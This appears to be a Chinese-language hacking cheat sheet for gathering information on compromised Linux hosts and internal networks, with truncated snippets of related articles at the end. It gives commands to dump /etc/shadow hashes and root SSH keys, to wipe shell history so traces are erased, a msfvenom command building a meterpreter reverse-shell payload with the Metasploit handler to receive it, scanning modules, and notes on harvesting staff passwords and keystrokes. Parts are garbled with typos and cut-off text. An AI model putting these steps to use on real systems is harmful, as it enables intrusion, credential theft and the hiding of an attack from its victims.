linux 內網本機資訊收集速查
系統型別
cat /etc/issue
檢視系統名稱
核心版本uname –a 檢視所有資訊
使用者whoami
idcat /etc/passwd #檢視使用者列表
cat /etc/shadow #獲取使用者hash
程序ps aux 檢視程序資訊
網絡卡/etc/network/inte***ces #網絡卡資訊
ifconfig
route #檢視路由
arp -a #檢視快取的位址解析情況
服務資訊cat /etc/serivice #檢視存在的服務
cat /etc/serices | grep ** #檢視對應服務
服務配置cat /etc/apache2/apache2.conf
cat /etc/my.conf
cat /etc/httpd/conf/httpd.conf
日誌資訊/var/log
/var/log/apache2/access.log #http日誌
/var/log/mysql/error.log #mysql日誌
/var/log/apt/history.log #apt日誌
歷史命令~/.bash_history
echo > .bash_history #上述檔案類日誌刪除
history #命令操作歷史
history -c #刪除
軟體資訊dpkg -l #檢視安裝的軟體包
rpm -qa #檢視安裝的軟體包
歷史命令!
/root/.bash_history
本地儲存的ssh金鑰
/root/.ssh/id_rsa
1.示例指令:
msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.73.131 lport=4444 -f elf > root/desktop/shell
2.配置metasploit
,exploit
監聽
search exploit/hanler // (exploit/multi/handler:通用有效負載處理程式)
use exploit/multi/handler // 使用模組
show options // 配置
set lhost 192.168.73.131
set payload linux/x86/meterpreter/reverse_tcp // 設定測試的載荷
exploit // 監聽
nmap掃瞄:
nmap ‐sp ‐pi 192.168.1.0/24 ‐t4
埠掃瞄
auxiliary/scanner/portscan
scanner/portscan/ack ack防火牆掃瞄
scanner/portscan/ftpbounce ftp跳埠掃瞄
scanner/portscan/syn syn埠掃瞄
scanner/portscan/tcp tcp埠掃瞄
scanner/portscan/xmas tcp"xmas"埠掃瞄
smb掃瞄
scanner下模組,輔助發現內網存活主機,分別為:
內網資訊收集
1 資訊收集 a.獲取當前組的計算機名 net viewb.檢視所有域 net view domainc.從計算機名獲取ipv4位址 ping n 1 計算機名 4 ps 如果計算機名很多時,可以利用bat批量ping獲取ip bat echo off setlocal enabledelayede...
內網資訊收集
主機資訊收集關鍵點 人員資訊收集關鍵點 人員口令密碼 ftp vnc mysql ssh mail等 人員角色 運維開發領導財務人力普通員工等 郵箱關聯關係 瀏覽器訪問記錄和密碼資訊 鍵盤記錄 rdp記錄 ssh記錄 最近開啟檔案 桌面檔案 電腦中的辦公檔案 doc xls pdf等 網路資訊收集關...
內網資訊收集命令
net user domain 檢視域使用者 net view domain 檢視有幾個域 net view domain 檢視域內的主機 net group domain 檢視域裡面的組 net group domain computer domain 檢視域內所有的主機名 net group d...